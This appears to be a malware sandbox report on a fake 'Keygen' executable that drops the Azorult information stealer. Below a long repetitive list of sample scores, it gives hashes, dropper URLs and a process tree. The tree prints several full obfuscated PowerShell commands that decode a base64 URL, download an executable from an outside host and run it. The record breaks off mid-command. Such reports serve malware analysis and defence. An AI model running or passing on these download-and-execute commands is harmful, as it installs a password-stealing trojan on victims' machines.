Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

1

201001-nyh...я.exe

windows10_x64

1

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

1

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

1

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

1

201001-nyh...6).exe

windows7_x64

8

201001-nyh...6).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

1

201001-nyh...я.exe

windows10_x64

1

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...9).exe

windows7_x64

201001-nyh...9).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...7).exe

windows7_x64

8

201001-nyh...7).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...8).exe

windows7_x64

8

201001-nyh...8).exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

1

201001-nyh...4).exe

windows7_x64

1

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

1

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

1

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

8

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    68s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (2) — копия.exe

  • Size

    849KB

  • MD5

    dbde61502c5c0e17ebc6919f361c32b9

  • SHA1

    189749cf0b66a9f560b68861f98c22cdbcafc566

  • SHA256

    88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b

  • SHA512

    d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 16 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 113 IoCs

Processes

  • C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (2) — ?????.exe""
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\Keygen.exe
      Keygen.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1028
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\m.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Blacklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1988
        • C:\Users\Public\wht.exe
          "C:\Users\Public\wht.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:2500
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2744
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              PID:3000
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2784
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
              6⤵
              • Executes dropped EXE
              PID:2980
          • C:\Users\Public\wht.exe
            "C:\Users\Public\wht.exe"
            5⤵
            • Executes dropped EXE
            PID:2856
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\m1.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:580
    • C:\Windows\SysWOW64\timeout.exe
      timeout 1
      2⤵
      • Delays execution with timeout.exe
      PID:1368
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\b.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:520
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\b1.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:768
    • C:\Windows\SysWOW64\timeout.exe
      timeout 2
      2⤵
      • Delays execution with timeout.exe
      PID:1828
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\ba.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 